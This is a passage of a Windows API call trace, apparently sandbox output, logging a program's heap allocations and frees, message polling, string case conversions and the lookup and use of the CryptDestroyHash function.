hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.068] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.068] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.068] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.069] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.069] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0261.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.071] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.071] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.078] RtlAllocateHeap 